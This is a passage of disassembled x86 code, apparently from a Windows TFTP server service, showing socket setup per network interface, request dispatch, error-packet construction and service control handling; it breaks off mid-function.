sub_10018DB proc near ; CODE XREF: sub_1001665+1FE�p
Memory = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ds:InitializeCriticalSection
push edi
push offset CriticalSection ; lpCriticalSection
call esi ; InitializeCriticalSection
push offset stru_1006020 ; lpCriticalSection
call esi ; InitializeCriticalSection
mov eax, offset dword_1006098
mov dword_100609C, eax
mov dword_1006098, eax
mov eax, offset Memory
mov dword_100603C, eax
mov Memory, eax
lea eax, [ebp+Memory]
push eax
call sub_1001FA6
xor esi, esi
test eax, eax
jnz short loc_1001957
mov eax, [ebp+Memory]
xor ebx, ebx
cmp [eax], esi
jbe short loc_100194F
xor edi, edi
loc_100192E: ; CODE XREF: sub_10018DB+72�j
mov ecx, [eax+edi+4]
cmp ecx, esi
jz short loc_1001947
cmp ecx, 100007Fh
jz short loc_1001947
push ecx ; in
call sub_100205A
mov eax, [ebp+Memory]
loc_1001947: ; CODE XREF: sub_10018DB+59�j
; sub_10018DB+61�j
inc ebx
add edi, 18h
cmp ebx, [eax]
jb short loc_100192E
loc_100194F: ; CODE XREF: sub_10018DB+4F�j
push eax ; Memory
call ds:free ; free
pop ecx
loc_1001957: ; CODE XREF: sub_10018DB+46�j
push offset dword_10060A0
call ds:RtlCreateTimerQueue ; RtlCreateTimerQueue
cmp eax, esi
jnz loc_10019EB
mov eax, 0EA60h
push esi
push eax
push eax
push esi
push offset sub_10029BA
push offset dword_1006048
push dword_10060A0
call ds:RtlCreateTimer ; RtlCreateTimer
push esi ; lpName
push esi ; bInitialState
push esi ; bManualReset
push esi ; lpEventAttributes
mov edi, eax
call ds:CreateEventA ; CreateEventA
cmp eax, esi
mov dword_1005DF8, eax
jnz short loc_10019A2
mov eax, edi
jmp short loc_10019EB
; ---------------------------------------------------------------------------
loc_10019A2: ; CODE XREF: sub_10018DB+C1�j
push esi
push 0FFFFFFFFh
push esi
push offset sub_1002219
push eax
push offset dword_1005DFC
call ds:RtlRegisterWait ; RtlRegisterWait
cmp eax, esi
jnz short loc_10019EB
mov ecx, offset overlapped
xor eax, eax
mov edi, ecx
push ecx ; overlapped
stosd
stosd
stosd
stosd
stosd
mov eax, dword_1005DF8
push offset Handle ; Handle
mov overlapped.hEvent, eax
call NotifyAddrChange ; NotifyAddrChange
cmp eax, esi
jz short loc_10019E9
cmp eax, 3E5h
jnz short loc_10019EB
loc_10019E9: ; CODE XREF: sub_10018DB+105�j
xor eax, eax
loc_10019EB: ; CODE XREF: sub_10018DB+89�j
; sub_10018DB+C5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_10018DB endp
; =============== S U B R O U T I N E =======================================
sub_10019F0 proc near ; CODE XREF: sub_1001665+203�p
mov eax, offset lpMem
push offset stru_1006060 ; lpCriticalSection
mov dword_100607C, eax
mov lpMem, eax
call ds:InitializeCriticalSection ; InitializeCriticalSection
push 0 ; dwMaximumSize
push 0EFD1Ch ; dwInitialSize
push 0 ; flOptions
call ds:HeapCreate ; HeapCreate
mov hHeap, eax
retn
sub_10019F0 endp
; =============== S U B R O U T I N E =======================================
sub_1001A1F proc near ; CODE XREF: sub_10029BA+79�p
push ebx
push esi
mov ebx, offset stru_1006060
push edi
push ebx ; lpCriticalSection
xor esi, esi
call ds:EnterCriticalSection
mov eax, dword_1005DF0
sub eax, dword_1005DF4
cmp eax, 0Ah
jbe short loc_1001A46
shr eax, 1
mov esi, eax
jmp short loc_1001A4E
; ---------------------------------------------------------------------------
loc_1001A46: ; CODE XREF: sub_1001A1F+1F�j
cmp eax, 3
jbe short loc_1001A4E
push 2
pop esi
loc_1001A4E: ; CODE XREF: sub_1001A1F+25�j
; sub_1001A1F+2A�j
test esi, esi
jbe short loc_1001A86
mov edi, esi
loc_1001A54: ; CODE XREF: sub_1001A1F+65�j
mov eax, lpMem
mov esi, eax
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h] ; hObject
call ds:CloseHandle ; CloseHandle
push esi ; lpMem
push 0 ; dwFlags
push hHeap ; hHeap
call ds:HeapFree
dec dword_1005DF0
dec edi
jnz short loc_1001A54
loc_1001A86: ; CODE XREF: sub_1001A1F+31�j
push ebx ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
pop esi
pop ebx
retn
sub_1001A1F endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1001A91(SOCKET s, int)
sub_1001A91 proc near ; CODE XREF: .text:01001DCC�p
; .text:01001DE1�p
dwFlags = dword ptr -10004h
argp = dword ptr -10000h
Fromlen = dword ptr -0FFFCh
var_FFF8 = dword ptr -0FFF8h
Buffers = _WSABUF ptr -0FFF4h
Handles = dword ptr -0FFECh
var_FFE8 = dword ptr -0FFE8h
Overlapped = _OVERLAPPED ptr -0FFE4h
to = sockaddr ptr -0FFD0h
var_FFC0 = dword ptr -0FFC0h
s = dword ptr 4
arg_4 = dword ptr 8
mov eax, 10004h
call _chkstk ; _chkstk
push ebx
push ebp
xor ebp, ebp
push esi
push edi
mov [esp+10014h+dwFlags], ebp
mov ebx, offset stru_1006060
loc_1001AAA: ; CODE XREF: sub_1001A91+291�j
lea eax, [esp+10014h+argp]
push eax ; argp
push 4004667Fh ; cmd
push [esp+1001Ch+s] ; s
call ds:ioctlsocket ; ioctlsocket
cmp eax, ebp
jnz loc_1001D27
cmp [esp+10014h+argp], ebp
jz loc_1001D65
xor eax, eax
lea edi, [esp+10014h+Overlapped]
stosd
stosd
stosd
stosd
push ebx ; lpCriticalSection
stosd
call ds:EnterCriticalSection
mov eax, lpMem
inc dword_1005DF4
cmp eax, offset lpMem
jz short loc_1001B11
mov ecx, [eax]
mov esi, eax
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h] ; hEvent
call ds:ResetEvent ; ResetEvent
mov eax, [esi+30h]
jmp short loc_1001B41
; ---------------------------------------------------------------------------
loc_1001B11: ; CODE XREF: sub_1001A91+64�j
inc dword_1005DF0
push 2FF6Ch ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
mov esi, eax
cmp esi, ebp
jz loc_1001D5E
push ebp ; lpName
push ebp ; bInitialState
push ebp ; bManualReset
push ebp ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov [esi+30h], eax
loc_1001B41: ; CODE XREF: sub_1001A91+7E�j
push ebx ; lpCriticalSection
mov [esp+10018h+Overlapped.hEvent], eax
call ds:LeaveCriticalSection
lea ebp, [esi+34h]
mov ecx, 3FEFh
xor eax, eax
mov edi, ebp
rep stosd
stosb
mov eax, [esp+10014h+arg_4]
mov [esp+10014h+Buffers.buf], ebp
mov [esp+10014h+Buffers.len], 0FFBDh
mov [esp+10014h+Fromlen], 10h
mov [esi+1Ch], eax
lea eax, [esp+10014h+Overlapped]
push 0 ; lpCompletionRoutine
push eax ; lpOverlapped
lea eax, [esp+1001Ch+Fromlen]
lea edi, [esi+2Ch]
push eax ; lpFromlen
lea eax, [esi+0Ch]
push eax ; lpFrom
lea eax, [esp+10024h+dwFlags]
push eax ; lpFlags
push edi ; lpNumberOfBytesRecvd
lea eax, [esp+1002Ch+Buffers]
push 1 ; dwBufferCount
push eax ; lpBuffers
push [esp+10034h+s] ; s
call ds:WSARecvFrom ; WSARecvFrom
mov [esp+10014h+var_FFF8], eax
mov ax, [esi+0Eh]
push eax ; netshort
call ds:ntohs ; ntohs
cmp [esp+10014h+var_FFF8], 0
jz short loc_1001C34
call ds:WSAGetLastError ; WSAGetLastError
cmp eax, 3E5h
jnz loc_1001D2F
mov eax, hHandle
push 0FFFFFFFFh ; dwMilliseconds
mov [esp+10018h+Handles], eax
mov eax, [esp+10018h+Overlapped.hEvent]
mov [esp+10018h+var_FFE8], eax
lea eax, [esp+10018h+Handles]
push 0 ; bWaitAll
push eax ; lpHandles
push 2 ; nCount
call ds:WaitForMultipleObjects ; WaitForMultipleObjects
cmp eax, 0FFFFFFFFh
jz loc_1001D2F
cmp eax, 102h
jz loc_1001D2F
test eax, eax
jz loc_1001D2F
lea eax, [esp+10014h+dwFlags]
push eax ; lpdwFlags
push 0 ; fWait
lea eax, [esp+1001Ch+Overlapped]
push edi ; lpcbTransfer
push eax ; lpOverlapped
push [esp+10024h+s] ; s
call ds:WSAGetOverlappedResult ; WSAGetOverlappedResult
test eax, eax
jnz short loc_1001C34
call ds:WSAGetLastError ; WSAGetLastError
jmp loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C34: ; CODE XREF: sub_1001A91+129�j
; sub_1001A91+196�j
push 0 ; dwMilliseconds
push hHandle ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
test eax, eax
jz loc_1001D2F
cmp dword ptr [edi], 2
jl loc_1001CEA
xor edi, edi
cmp [esp+10014h+arg_4], edi
jz short loc_1001CDA
mov ax, [ebp+0]
push eax ; hostshort
call ds:htons ; htons
movzx ecx, ax
test ecx, ecx
jle short loc_1001CB8
cmp ecx, 2
jle short loc_1001C81
cmp ecx, 4
jz short loc_1001CB8
cmp ecx, 5
jnz short loc_1001CB8
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C81: ; CODE XREF: sub_1001A91+1E2�j
cmp ax, 1
jnz short loc_1001C94
inc dword ptr Time+4
mov edi, offset sub_1002F31
jmp short loc_1001CA5
; ---------------------------------------------------------------------------
loc_1001C94: ; CODE XREF: sub_1001A91+1F4�j
cmp ax, 2
jnz short loc_1001CA5
inc dword_10060C8
mov edi, offset sub_100333A
loc_1001CA5: ; CODE XREF: sub_1001A91+201�j
; sub_1001A91+207�j
mov eax, [esp+10014h+s]
test edi, edi
mov [esi+8], eax
jz short loc_1001CEA
push esi
call edi ; sub_1002F31
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CB8: ; CODE XREF: sub_1001A91+1DD�j
; sub_1001A91+1E7�j ...
push 0 ; int
push 4 ; hostshort
push [esp+1001Ch+s] ; s
inc dword_10060CC
lea eax, [esp+10020h+var_FFC0]
push eax ; int
lea eax, [esp+10024h+to]
push eax ; to
call sub_100230A
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CDA: ; CODE XREF: sub_1001A91+1CB�j
mov eax, [esp+10014h+s]
push esi
mov [esi+8], eax
call sub_1002EC8
loc_1001CEA: ; CODE XREF: sub_1001A91+19E�j
; sub_1001A91+1BC�j ...
push ebx ; lpCriticalSection
call ds:EnterCriticalSection
mov eax, lpMem
mov dword ptr [esi+4], offset lpMem
mov [esi], eax
push offset Addend ; lpAddend
mov [eax+4], esi
mov lpMem, esi
call ds:InterlockedIncrement ; InterlockedIncrement
dec dword_1005DF4
push ebx ; lpCriticalSection
call ds:LeaveCriticalSection
xor ebp, ebp
jmp loc_1001AAA
; ---------------------------------------------------------------------------
loc_1001D27: ; CODE XREF: sub_1001A91+32�j
call ds:WSAGetLastError ; WSAGetLastError
jmp short loc_1001D65
; ---------------------------------------------------------------------------
loc_1001D2F: ; CODE XREF: sub_1001A91+136�j
; sub_1001A91+161�j ...
push ebx ; lpCriticalSection
call ds:EnterCriticalSection
mov eax, lpMem
mov dword ptr [esi+4], offset lpMem
mov [esi], eax
push offset Addend ; lpAddend
mov [eax+4], esi
mov lpMem, esi
call ds:InterlockedIncrement ; InterlockedIncrement
dec dword_1005DF4
loc_1001D5E: ; CODE XREF: sub_1001A91+9D�j
push ebx ; lpCriticalSection
call ds:LeaveCriticalSection
loc_1001D65: ; CODE XREF: sub_1001A91+3C�j
; sub_1001A91+29C�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 10004h
retn 8
sub_1001A91 endp
; ---------------------------------------------------------------------------
loc_1001D74: ; DATA XREF: sub_100188E+2D�o
push ecx
push ebx
push ebp
push esi
mov esi, offset stru_1006020
push edi
mov edi, ds:TryEnterCriticalSection
push esi
xor ebp, ebp
xor ebx, ebx
call edi ; TryEnterCriticalSection
loc_1001D8B: ; CODE XREF: .text:01001DA1�j
test eax, eax
jnz short loc_1001DA7
push 0C8h
call ds:Sleep ; Sleep
push esi
call edi ; TryEnterCriticalSection
inc ebx
cmp ebx, 7Dh
jb short loc_1001D8B
test eax, eax
jz short loc_1001DD1
loc_1001DA7: ; CODE XREF: .text:01001D8D�j
lea eax, [esp+10h]
push eax
push dword ptr [esp+1Ch]
call sub_10021E5
test eax, eax
jnz short loc_1001DC0
mov eax, [esp+10h]
mov ebp, [eax+0Ch]
loc_1001DC0: ; CODE XREF: .text:01001DB7�j
push esi
call ds:LeaveCriticalSection
push ebp
push dword ptr [esp+1Ch]
call sub_1001A91
loc_1001DD1: ; CODE XREF: .text:01001DA5�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1001DDB: ; DATA XREF: sub_100188E:loc_10018C2�o
push 0
push dword ptr [esp+8]
call sub_1001A91
xor eax, eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __stdcall HandlerProc(DWORD)
HandlerProc proc near ; DATA XREF: sub_1001665+6�o
Time = qword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+Time]
push eax ; Time
call ds:time ; time
inc ServiceStatus.dwCheckPoint
pop ecx
lea eax, [ebp+Time]
push eax ; Time
call ds:ctime ; ctime
mov eax, [ebp+arg_0]
pop ecx
dec eax
jz short loc_1001E68
dec eax
jz short loc_1001E35
dec eax
jz short loc_1001E1D
dec eax
dec eax
jz short loc_1001E68
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E1D: ; CODE XREF: HandlerProc+2A�j
push hThread ; hThread
call ds:ResumeThread ; ResumeThread
mov ServiceStatus.dwCurrentState, 4
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E35: ; CODE XREF: HandlerProc+27�j
push hThread ; hThread
call ds:SuspendThread ; SuspendThread
mov ServiceStatus.dwCurrentState, 7
loc_1001E4B: ; CODE XREF: HandlerProc+30�j
; HandlerProc+48�j
push offset ServiceStatus ; lpServiceStatus
push hServiceStatus ; hServiceStatus
call ds:SetServiceStatus ; SetServiceStatus
test eax, eax
jnz short locret_1001E6F
call ds:GetLastError
jmp short locret_1001E6F
; ---------------------------------------------------------------------------
loc_1001E68: ; CODE XREF: HandlerProc+24�j
; HandlerProc+2E�j
push 0
call sub_1001E73
locret_1001E6F: ; CODE XREF: HandlerProc+73�j
; HandlerProc+7B�j
leave
retn 4
HandlerProc endp
; =============== S U B R O U T I N E =======================================
sub_1001E73 proc near ; CODE XREF: sub_1001665+B9�p
; HandlerProc+7F�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, ds:SetServiceStatus
push edi
mov edi, offset ServiceStatus
push edi ; lpServiceStatus
mov ServiceStatus.dwCurrentState, 3
push hServiceStatus ; hServiceStatus
call esi ; SetServiceStatus
mov ebp, ds:GetLastError
xor ebx, ebx
cmp eax, ebx
jnz short loc_1001EA3
call ebp ; GetLastError
loc_1001EA3: ; CODE XREF: sub_1001E73+2C�j
push hHandle ; hEvent
call ds:SetEvent ; SetEvent
mov ServiceStatus.dwCurrentState, 1
mov ServiceStatus.dwCheckPoint, ebx
mov eax, [esp+10h+arg_0]
mov ServiceStatus.dwWaitHint, ebx
cmp eax, ebx
jnz short loc_1001EDB
mov ServiceStatus.dwWin32ExitCode, ebx
mov ServiceStatus.dwServiceSpecificExitCode, ebx
jmp short loc_1001EFD
; ---------------------------------------------------------------------------
loc_1001EDB: ; CODE XREF: sub_1001E73+58�j
cmp eax, 834h
jb short loc_1001EF3
cmp eax, 16A7h
mov ServiceStatus.dwWin32ExitCode, 42Ah
jbe short loc_1001EF8
loc_1001EF3: ; CODE XREF: sub_1001E73+6D�j
mov ServiceStatus.dwWin32ExitCode, eax
loc_1001EF8: ; CODE XREF: sub_1001E73+7E�j
mov ServiceStatus.dwServiceSpecificExitCode, eax
loc_1001EFD: ; CODE XREF: sub_1001E73+66�j
push edi ; lpServiceStatus
push hServiceStatus ; hServiceStatus
call esi ; SetServiceStatus
cmp eax, ebx
jnz short loc_1001F0C
call ebp ; GetLastError
loc_1001F0C: ; CODE XREF: sub_1001E73+95�j
mov eax, hObject
mov esi, ds:CloseHandle
cmp eax, ebx
jz short loc_1001F24
push eax ; hObject
call esi ; CloseHandle
mov hObject, ebx
loc_1001F24: ; CODE XREF: sub_1001E73+A6�j
mov eax, hHandle
cmp eax, ebx
jz short loc_1001F36
push eax ; hObject
call esi ; CloseHandle
mov hHandle, ebx
loc_1001F36: ; CODE XREF: sub_1001E73+B8�j
mov eax, File
cmp eax, ebx
jz short loc_1001F4D
push eax ; File
call ds:fclose ; fclose
pop ecx
mov File, ebx
loc_1001F4D: ; CODE XREF: sub_1001E73+CA�j
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_1001E73 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1001F54(void *Memory)
sub_1001F54 proc near ; CODE XREF: sub_1002182+1C�p
; sub_1002219+B7�p
Memory = dword ptr 4
push esi
mov esi, [esp+4+Memory]
push 0FFFFFFFFh
push dword ptr [esi+10h]
call ds:RtlDeregisterWaitEx ; RtlDeregisterWaitEx
push dword ptr [esi+8] ; s
call ds:closesocket ; closesocket
push dword ptr [esi+14h] ; hEvent
call ds:WSACloseEvent ; WSACloseEvent
mov eax, [esi]
mov ecx, [esi+4]
cmp eax, ecx
jnz short loc_1001F90
mov eax, Memory
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
jmp short loc_1001F9A
; ---------------------------------------------------------------------------
loc_1001F90: ; CODE XREF: sub_1001F54+29�j
mov [ecx], eax
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
loc_1001F9A: ; CODE XREF: sub_1001F54+3A�j
push esi ; Memory
call ds:free ; free
pop ecx
pop esi
retn 4
sub_1001F54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001FA6 proc near ; CODE XREF: sub_10018DB+3D�p
; sub_1002219+1D�p
var_8 = dword ptr -8
Size = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+Size]
push edi ; bOrder
push eax ; pdwSize
push edi ; pIpAddrTable
mov [ebp+Size], edi
mov [ebp+var_8], 0C0000017h
mov [ebx], edi
call GetIpAddrTable ; GetIpAddrTable
cmp eax, edi
jz short loc_1001FD3
cmp eax, 7Ah
jnz short loc_100201A
loc_1001FD3: ; CODE XREF: sub_1001FA6+26�j
push [ebp+Size] ; Size
call ds:malloc ; malloc
mov esi, eax
pop ecx
cmp esi, edi
jz short loc_100201A
loc_1001FE3: ; CODE XREF: sub_1001FA6+63�j
lea eax, [ebp+Size]
push edi ; bOrder
push eax ; pdwSize
push esi ; pIpAddrTable
call GetIpAddrTable ; GetIpAddrTable
cmp eax, edi
jz short loc_1002015
cmp eax, 7Ah
jnz short loc_100201A
push [ebp+Size] ; NewSize
push esi ; Memory
call ds:realloc ; realloc
pop ecx
cmp eax, edi
pop ecx
jz short loc_100200B
mov esi, eax
jmp short loc_1001FE3
; ---------------------------------------------------------------------------
loc_100200B: ; CODE XREF: sub_1001FA6+5F�j
push esi ; Memory
call ds:free ; free
pop ecx
jmp short loc_100201A
; ---------------------------------------------------------------------------
loc_1002015: ; CODE XREF: sub_1001FA6+4A�j
mov [ebp+var_8], edi
mov [ebx], esi
loc_100201A: ; CODE XREF: sub_1001FA6+2B�j
; sub_1001FA6+3B�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn 4
sub_1001FA6 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1002024(struct in_addr in, int)
sub_1002024 proc near ; CODE XREF: sub_100205A+B7�p
in = in_addr ptr 4
arg_4 = dword ptr 8
push dword ptr [esp+in.S_un] ; in
call ds:inet_ntoa ; inet_ntoa
test eax, eax
jz short locret_1002057
push edi
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push esi
mov eax, ecx
mov esi, edi
mov edi, [esp+8+arg_4]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
pop edi
locret_1002057: ; CODE XREF: sub_1002024+C�j
retn 8
sub_1002024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100205A(struct in_addr in)
sub_100205A proc near ; CODE XREF: sub_10018DB+64�p
; sub_1002219+65�p ...
var_28 = dword ptr -28h
name = sockaddr ptr -14h
var_4 = dword ptr -4
in = in_addr ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_4], esi
loc_1002068: ; CODE XREF: sub_100205A+5D�j
push 1 ; dwFlags
push esi ; g
push esi ; lpProtocolInfo
push esi ; protocol
push 2 ; type
push 2 ; af
call ds:WSASocketA ; WSASocketA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_100209D
xor eax, eax
lea edi, [ebp+name]
stosd
stosd
stosd
push offset proto ; "udp"
push offset name ; "tftp"
stosd
call ds:getservbyname ; getservbyname
cmp eax, esi
jnz short loc_10020B9
jmp short loc_10020B1
; ---------------------------------------------------------------------------
loc_100209D: ; CODE XREF: sub_100205A+22�j
call ds:WSAGetLastError ; WSAGetLastError
push 2EEh ; dwMilliseconds
call ds:Sleep ; Sleep
inc [ebp+var_4]
loc_10020B1: ; CODE XREF: sub_100205A+41�j
cmp [ebp+var_4], 0Ah
jge short loc_10020E6
jmp short loc_1002068
; ---------------------------------------------------------------------------
loc_10020B9: ; CODE XREF: sub_100205A+3F�j
mov [ebp+name.sa_family], 2
mov ax, [eax+8]
mov word ptr [ebp+name.sa_data], ax
mov eax, dword ptr [ebp+in.S_un]
mov dword ptr [ebp+name.sa_data+2], eax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push ebx ; s
call ds:bind ; bind
test eax, eax
jz short loc_10020E6
call ds:GetLastError
jmp short loc_100215E
; ---------------------------------------------------------------------------
loc_10020E6: ; CODE XREF: sub_100205A+5B�j
; sub_100205A+82�j
cmp ebx, 0FFFFFFFFh
jz short loc_100215E
push 20h ; Size
call ds:malloc ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_100213D
push 8
xor eax, eax
pop ecx
mov edi, esi
rep stosd
mov eax, dword ptr [ebp+in.S_un]
lea ecx, [ebp+var_28]
push ecx ; int
push eax ; in
mov [esi+8], ebx
mov [esi+0Ch], eax
call sub_1002024
xor eax, eax
push eax ; lpName
push eax ; bInitialState
push eax ; bManualReset
push eax ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov edi, eax
test edi, edi
jz short loc_1002140
push 1 ; char
push edi ; hEventObject
push ebx ; s
mov [esi+14h], edi
call sub_100188E
test eax, eax
mov [esi+10h], eax
jnz short loc_1002162
jmp short loc_1002140
; ---------------------------------------------------------------------------
loc_100213D: ; CODE XREF: sub_100205A+9E�j
mov edi, dword ptr [ebp+in.S_un]
loc_1002140: ; CODE XREF: sub_100205A+CC�j
; sub_100205A+E1�j
push ebx ; s
call ds:closesocket ; closesocket
test edi, edi
jz short loc_1002152
push edi ; hObject
call ds:CloseHandle ; CloseHandle
loc_1002152: ; CODE XREF: sub_100205A+EF�j
test esi, esi
jz short loc_100215E
push esi ; Memory
call ds:free ; free
pop ecx
loc_100215E: ; CODE XREF: sub_100205A+8A�j
; sub_100205A+8F�j ...
xor eax, eax
jmp short loc_100217B
; ---------------------------------------------------------------------------
loc_1002162: ; CODE XREF: sub_100205A+DF�j
mov eax, Memory
mov dword ptr [esi+4], offset Memory
mov [esi], eax
mov [eax+4], esi
mov Memory, esi
mov eax, esi
loc_100217B: ; CODE XREF: sub_100205A+106�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_100205A endp
; =============== S U B R O U T I N E =======================================
sub_1002182 proc near ; CODE XREF: sub_1002219:loc_1002298�p
mov ecx, Memory
push esi
mov esi, offset Memory
xor eax, eax
cmp ecx, esi
jz short loc_10021B3
push edi
loc_1002195: ; CODE XREF: sub_1002182+2E�j
cmp dword ptr [ecx+18h], 0
mov edi, [ecx]
jnz short loc_10021A8
push ecx ; Memory
call sub_1001F54
push 1
pop eax
jmp short loc_10021AC
; ---------------------------------------------------------------------------
loc_10021A8: ; CODE XREF: sub_1002182+19�j
and dword ptr [ecx+18h], 0
loc_10021AC: ; CODE XREF: sub_1002182+24�j
cmp edi, esi
mov ecx, edi
jnz short loc_1002195
pop edi
loc_10021B3: ; CODE XREF: sub_1002182+10�j
pop esi
retn
sub_1002182 endp
; =============== S U B R O U T I N E =======================================
sub_10021B5 proc near ; CODE XREF: sub_1002219+43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset Memory
and dword ptr [edx], 0
mov eax, Memory
loc_10021C7: ; CODE XREF: sub_10021B5+21�j
cmp eax, ecx
jz short loc_10021DF
mov esi, [eax+0Ch]
cmp esi, [esp+4+arg_0]
jz short loc_10021D8
mov eax, [eax]
jmp short loc_10021C7
; ---------------------------------------------------------------------------
loc_10021D8: ; CODE XREF: sub_10021B5+1D�j
push 1
mov [edx], eax
pop eax
jmp short loc_10021E1
; ---------------------------------------------------------------------------
loc_10021DF: ; CODE XREF: sub_10021B5+14�j
xor eax, eax
loc_10021E1: ; CODE XREF: sub_10021B5+28�j
pop esi
retn 8
sub_10021B5 endp
; =============== S U B R O U T I N E =======================================
sub_10021E5 proc near ; CODE XREF: .text:01001DB0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset Memory
and dword ptr [edx], 0
mov eax, Memory
loc_10021F7: ; CODE XREF: sub_10021E5+21�j
cmp eax, ecx
jz short loc_100220A
mov esi, [eax+8]
cmp esi, [esp+4+arg_0]
jz short loc_1002208
mov eax, [eax]
jmp short loc_10021F7
; ---------------------------------------------------------------------------
loc_1002208: ; CODE XREF: sub_10021E5+1D�j
mov [edx], eax
loc_100220A: ; CODE XREF: sub_10021E5+14�j
mov eax, [edx]
pop esi
neg eax
sbb eax, eax
and al, 0A9h
add eax, 57h
retn 8
sub_10021E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002219 proc near ; DATA XREF: sub_10018DB+CB�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Memory = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor esi, esi
push offset stru_1006020 ; lpCriticalSection
mov [ebp+var_C], esi
call ds:EnterCriticalSection
lea eax, [ebp+Memory]
push eax
call sub_1001FA6
test eax, eax
jnz short loc_10022A9
mov eax, [ebp+Memory]
xor ebx, ebx
cmp [eax], esi
jbe short loc_1002298
loc_1002248: ; CODE XREF: sub_1002219+7D�j
mov eax, [eax+esi+4]
test eax, eax
jz short loc_100228D
cmp eax, 100007Fh
jz short loc_100228D
lea ecx, [ebp+var_8]
push ecx
push eax
call sub_10021B5
test eax, eax
jz short loc_1002271
mov eax, [ebp+var_8]
mov dword ptr [eax+18h], 1
jmp short loc_100228D
; ---------------------------------------------------------------------------
loc_1002271: ; CODE XREF: sub_1002219+4A�j
mov eax, [ebp+Memory]
push 1
pop edi
push dword ptr [eax+esi+4] ; in
mov [ebp+var_C], edi
call sub_100205A
test eax, eax
mov [ebp+var_8], eax
jz short loc_100228D
mov [eax+18h], edi
loc_100228D: ; CODE XREF: sub_1002219+35�j
; sub_1002219+3C�j ...
mov eax, [ebp+Memory]
inc ebx
add esi, 18h
cmp ebx, [eax]
jb short loc_1002248
loc_1002298: ; CODE XREF: sub_1002219+2D�j
call sub_1002182
push [ebp+Memory] ; Memory
mov esi, eax
call ds:free ; free
pop ecx
loc_10022A9: ; CODE XREF: sub_1002219+24�j
cmp [ebp+var_C], 0
jnz short loc_10022E9
test esi, esi
jnz short loc_10022E9
mov eax, Memory
mov edi, offset Memory
cmp eax, edi
jz short loc_10022E9
loc_10022C1: ; CODE XREF: sub_1002219+CE�j
mov [ebp+var_8], eax
mov ebx, [eax]
test byte ptr [eax+1Ch], 1
jnz short loc_10022E3
mov esi, [eax+0Ch]
push eax ; Memory
call sub_1001F54
push esi ; in
call sub_100205A
test eax, eax
jz short loc_10022E3
or dword ptr [eax+1Ch], 1
loc_10022E3: ; CODE XREF: sub_1002219+B1�j
; sub_1002219+C4�j
cmp ebx, edi
mov eax, ebx
jnz short loc_10022C1
loc_10022E9: ; CODE XREF: sub_1002219+94�j
; sub_1002219+98�j ...
push offset overlapped ; overlapped
push offset Handle ; Handle
call NotifyAddrChange ; NotifyAddrChange
push offset stru_1006020 ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002219 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100230A(struct sockaddr *to, int, SOCKET s, u_short hostshort, int)
sub_100230A proc near ; CODE XREF: sub_1001A91+242�p
; sub_10023D8+23C�p ...
buf = byte ptr -0FFBCh
var_FFBA = word ptr -0FFBAh
var_FFB8 = byte ptr -0FFB8h
to = dword ptr 8
s = dword ptr 10h
hostshort = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 0FFBCh
call _chkstk ; _chkstk
push ebx
push esi
mov esi, ds:htons
push edi
push 5 ; hostshort
call esi ; htons
mov edi, dword ptr [ebp+hostshort]
mov word ptr [ebp+buf], ax
push edi ; hostshort
call esi ; htons
cmp [ebp+arg_10], 0
mov [ebp+var_FFBA], ax
jz short loc_1002369
